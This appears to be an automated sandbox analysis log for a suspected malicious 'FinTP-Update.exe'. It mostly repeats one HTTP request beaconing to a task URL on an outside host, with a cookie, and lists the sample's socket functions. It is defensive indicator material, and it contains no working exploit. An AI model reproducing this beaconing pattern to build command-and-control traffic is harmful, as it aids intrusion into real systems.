          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_00007FF7193C1270 memcmp,_invalid_parameter_noinfo_noreturn,memcpy,memcmp,_invalid_parameter_noinfo_noreturn,memcpy,memchr,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,socket,inet_addr,gethostbyname,inet_addr,gethostbyaddr,htons,connect,closesocket,send,memset,recv,realloc,memcpy,memset,recv,strstr,strstr,memcpy,strncpy,closesocket,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7193C1270
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /rss/portallogin-gettask.html HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Host: www.flntp.roAccept-Encoding: gzip, deflateCookie: __cfduid=eKAO_5TgL4xP3D62TIkdbPgh-79Ap6a7xtGFMGQUMQYHfBsRYHBsagL_VYUOGQCdRCz_9wvSynmanfFSwrpSIcxxoTJaCgw5YLBpkQ0V8IIpUnQVRAjAJpyrXFqloA3HXkNZ1D2f5dkmuo5fhF9R4sJj46GDYIN644qXOdjQWLwUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveCache-Control: no-cache
